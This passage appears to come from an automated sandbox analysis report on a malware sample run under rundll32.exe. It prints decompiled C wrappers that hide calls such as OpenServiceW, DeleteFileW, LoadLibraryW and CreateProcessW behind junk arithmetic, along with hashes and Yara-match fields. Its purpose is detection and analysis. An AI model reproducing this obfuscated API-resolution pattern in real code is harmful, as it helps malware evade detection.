                                              • Instruction Fuzzy Hash: D311B272801248FBDF16DF95DD0ACEE7F7AEF89314F148198FA1862120D3769A60EB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007E981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 54%
                                              			E007E981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007D602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E007E07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                              0x007e9821
                                              0x007e9822
                                              0x007e9825
                                              0x007e9828
                                              0x007e982a
                                              0x007e982c
                                              0x007e982f
                                              0x007e9832
                                              0x007e9835
                                              0x007e9836
                                              0x007e9837
                                              0x007e983c
                                              0x007e9855
                                              0x007e9858
                                              0x007e985f
                                              0x007e9866
                                              0x007e986d
                                              0x007e9874
                                              0x007e987b
                                              0x007e988e
                                              0x007e989b
                                              0x007e98a2

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,007D87F2,0000CAAE,0000510C,AD82F196), ref: 007E989B
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction ID: c1e27797e5cf90d1a85ac65f66eaed0a4cf710e30e670148903d3ac463563916
                                              • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction Fuzzy Hash: 6F015A76801208FBDF04EFD5D84ACDFBF79EF85750F108199F918A6220E6715B619BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007E7BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E007E7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E007D602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E007E07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                              0x007e7bf7
                                              0x007e7bf8
                                              0x007e7bfa
                                              0x007e7bfd
                                              0x007e7bff
                                              0x007e7c02
                                              0x007e7c06
                                              0x007e7c07
                                              0x007e7c0f
                                              0x007e7c1d
                                              0x007e7c25
                                              0x007e7c2d
                                              0x007e7c31
                                              0x007e7c38
                                              0x007e7c3f
                                              0x007e7c46
                                              0x007e7c4a
                                              0x007e7c5e
                                              0x007e7c67
                                              0x007e7c6d

                                              APIs
                                              • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 007E7C67
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FileOperation
                                              • String ID:
                                              • API String ID: 3080627654-0
                                              • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction ID: f046828c034c1c33b58e03669a024759dd855791b12fecd21356839417d68a3f
                                              • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction Fuzzy Hash: 9E014BB190120CFFEB09DFA4C84E8DEBBB9EF44314F208199F405A7240EAB15F609B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007DF65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 52%
                                              			E007DF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E007D602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E007E07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                              0x007df662
                                              0x007df663
                                              0x007df665
                                              0x007df668
                                              0x007df66a
                                              0x007df66d
                                              0x007df670
                                              0x007df673
                                              0x007df677
                                              0x007df678
                                              0x007df67d
                                              0x007df687
                                              0x007df693
                                              0x007df69a
                                              0x007df6a1
                                              0x007df6a5
                                              0x007df6a9
                                              0x007df6b0
                                              0x007df6c9
                                              0x007df6d8
                                              0x007df6de

                                              APIs
                                              • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 007DF6D8
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: OpenService
                                              • String ID:
                                              • API String ID: 3098006287-0
                                              • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction ID: 8bef7e7254d1eb45bbc5d98bf45e8823c796f323d164a7d010b4ce4c40f13005
                                              • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction Fuzzy Hash: 5901E5B6901208BFEF059F94DC0A8DF7F75EB09324F148188F90462250D6B65E61DBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007DB6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E007DB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E007D602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E007E07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                              0x007db6f3
                                              0x007db6f8
                                              0x007db702
                                              0x007db70b
                                              0x007db712
                                              0x007db719
                                              0x007db720
                                              0x007db727
                                              0x007db72e
                                              0x007db747
                                              0x007db759
                                              0x007db75e

                                              APIs
                                              • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 007DB759
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FileHandleInformation
                                              • String ID:
                                              • API String ID: 3935143524-0
                                              • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction ID: 2dd34698247909c398ac4b7e91030138618d8ad558ca1caa0f39b923ac793353
                                              • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction Fuzzy Hash: 51012CB5941308FBEF45DF94DD06E9E7BB5EB18704F108188FA0566190D3B15E209B51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007EAA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E007EAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E007D602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E007E07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                              0x007eaa3f
                                              0x007eaa40
                                              0x007eaa41
                                              0x007eaa44
                                              0x007eaa47
                                              0x007eaa4b
                                              0x007eaa4c
                                              0x007eaa51
                                              0x007eaa5b
                                              0x007eaa64
                                              0x007eaa68
                                              0x007eaa6f
                                              0x007eaa76
                                              0x007eaa8d
                                              0x007eaa90
                                              0x007eaa9d
                                              0x007eaaa8
                                              0x007eaaad

                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 007EAAA8
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction ID: 147210e2122d8342fe83888b5ca690e2ffd1937bb775889c337a94b730a930d7
                                              • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction Fuzzy Hash: 0EF019B590020CFFDF08DF94DD4A99EBFB5EB45304F108198F915A6250D3B69F649B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 007D5FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 70%
                                              			E007D5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E007D602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E007E07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                              0x007d5fb5
                                              0x007d5fb6
                                              0x007d5fb7
                                              0x007d5fbb
                                              0x007d5fbc
                                              0x007d5fc1
                                              0x007d5fcb
                                              0x007d5fd7
                                              0x007d5fde
                                              0x007d5fe5
                                              0x007d5ffc
                                              0x007d5fff
                                              0x007d6006
                                              0x007d600d
                                              0x007d601a
                                              0x007d6025
                                              0x007d602a

                                              APIs
                                              • CloseServiceHandle.ADVAPI32(39CCF342), ref: 007D6025
                                              Memory Dump Source
                                              • Source File: 0000000C.00000002.2117263919.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true
                                              • Associated: 0000000C.00000002.2117258065.00000000007D0000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000C.00000002.2117307243.00000000007EC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandleService
                                              • String ID:
                                              • API String ID: 1725840886-0
                                              • Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction ID: 4ca4490cd9fe8fc81a1194b05647fe7d730e2ca7d9f2145fca7d81760fb2159e
                                              • Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
                                              • Instruction Fuzzy Hash: DDF04FB0C11208FFDB08DFA0E94689EBFB9EB44300F208198E409A7260E7B55F559F54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Analysis Process: rundll32.exe PID: 2968 Parent PID: 2276 rundll32.exeCOMMON

                                              Executed Functions

                                              Function 00262959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E00262959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E0026602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E002707A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}









                                              0x0026295f
                                              0x00262964
                                              0x00262967
                                              0x0026296a
                                              0x0026296d
                                              0x0026296e
                                              0x0026296f
                                              0x00262977
                                              0x00262985
                                              0x0026298a
                                              0x00262992
                                              0x0026299a
                                              0x002629a2
                                              0x002629a9
                                              0x002629b0
                                              0x002629b7
                                              0x002629bb
                                              0x002629cf
                                              0x002629dc
                                              0x002629e2

                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002629DC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: ManagerOpen
                                              • String ID: <^
                                              • API String ID: 1889721586-3203995635
                                              • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction ID: 6d9a063f7ea6605d4a656c69f5146aac6d64d78e71d7ffdec781d4f17466abe7
                                              • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction Fuzzy Hash: C9016D72A00108BFEB18DF95DC4A8DFBFB6EF44310F108098F508A6250D7B65F619B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0026C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E0026C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0026602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002707A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                              0x0026c6e1
                                              0x0026c6e6
                                              0x0026c6f0
                                              0x0026c6fc
                                              0x0026c703
                                              0x0026c706
                                              0x0026c70d
                                              0x0026c711
                                              0x0026c715
                                              0x0026c71c
                                              0x0026c723
                                              0x0026c72a
                                              0x0026c731
                                              0x0026c738
                                              0x0026c751
                                              0x0026c762
                                              0x0026c768

                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0026C762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPath
                                              • String ID: /O
                                              • API String ID: 1514166925-1923427199
                                              • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction ID: 9eafb53852c98c4aba7087d8b425b2dc95f86566a6b195a773cb5418ec8fd585
                                              • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction Fuzzy Hash: D01133B290122DBBCB25DF95DC898EFBFB8EF04714F108188F90962210D3714B659BE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00261000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E00261000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0026602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002707A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                              0x00261006
                                              0x00261009
                                              0x0026100c
                                              0x00261011
                                              0x00261016
                                              0x0026101d
                                              0x00261026
                                              0x0026102d
                                              0x00261034
                                              0x0026103b
                                              0x00261047
                                              0x0026104f
                                              0x00261057
                                              0x0026105e
                                              0x00261065
                                              0x0026106c
                                              0x00261073
                                              0x00261077
                                              0x0026108b
                                              0x00261096
                                              0x0026109b

                                              APIs
                                              • LoadLibraryW.KERNEL32(0033A3B7), ref: 00261096
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: [
                                              • API String ID: 1029625771-3431493590
                                              • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction ID: a6aafd67ac359982971a89c6656b5d9b115ca9250fe597342efecc921f64e71d
                                              • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction Fuzzy Hash: E5015BB6D01308FBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B689B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00264859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E00264859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002707A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                              0x0026485e
                                              0x0026487a
                                              0x0026487d
                                              0x00264884
                                              0x0026488b
                                              0x00264892
                                              0x0026489d
                                              0x002648a0
                                              0x002648ad
                                              0x002648b7

                                              APIs
                                              • ExitProcess.KERNELBASE(00000000), ref: 002648B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: [
                                              • API String ID: 621844428-1822564810
                                              • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction ID: 513f1c2211b9f4615fea5d8a768133cedf2d37b0ef30595692cf4e26653409db
                                              • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction Fuzzy Hash: 39F017B0A15209FBDB08CFE8CA9699EBFB9EB40301F20818CE444B7290E3B15F549B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 00274F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 66%
                                              			E00274F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0026602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002707A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                              0x00274f80
                                              0x00274f81
                                              0x00274f82
                                              0x00274f86
                                              0x00274f87
                                              0x00274f8c
                                              0x00274fa5
                                              0x00274fa8
                                              0x00274faf
                                              0x00274fb6
                                              0x00274fc7
                                              0x00274fca
                                              0x00274fd7
                                              0x00274fe2
                                              0x00274fe7

                                              APIs
                                              • CloseHandle.KERNELBASE(003E66D8), ref: 00274FE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: {#lm
                                              • API String ID: 2962429428-1564096886
                                              • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction ID: 64b9e80ab57b8190464cfe717bd6af648b65d509132e68873cebd42aa26b7e96
                                              • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction Fuzzy Hash: 80F037B081120CFFDB08DFA4D98689EBFBAEB40300F208199E808AB250D3715B549B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0027976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 21%
                                              			E0027976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0026602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002707A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                              0x00279772
                                              0x00279773
                                              0x00279778
                                              0x0027977a
                                              0x0027977b
                                              0x0027977e
                                              0x0027977f
                                              0x00279782
                                              0x00279785
                                              0x00279788
                                              0x00279789
                                              0x0027978c
                                              0x0027978f
                                              0x00279790
                                              0x00279791
                                              0x00279794
                                              0x00279797
                                              0x0027979a
                                              0x0027979d
                                              0x002797a0
                                              0x002797a3
                                              0x002797a6
                                              0x002797a7
                                              0x002797a8
                                              0x002797ad
                                              0x002797b7
                                              0x002797c3
                                              0x002797ca
                                              0x002797d1
                                              0x002797d8
                                              0x002797df
                                              0x002797e3
                                              0x002797fc
                                              0x00279816
                                              0x0027981d

                                              APIs
                                              • CreateProcessW.KERNEL32(0026591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0026591A), ref: 00279816
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.2120200224.0000000000261000.00000020.00000001.sdmp, Offset: 00260000, based on PE: true
                                              • Associated: 0000000D.00000002.2120192067.0000000000260000.00000004.00000001.sdmp Download File
                                              • Associated: 0000000D.00000002.2120237573.000000000027C000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
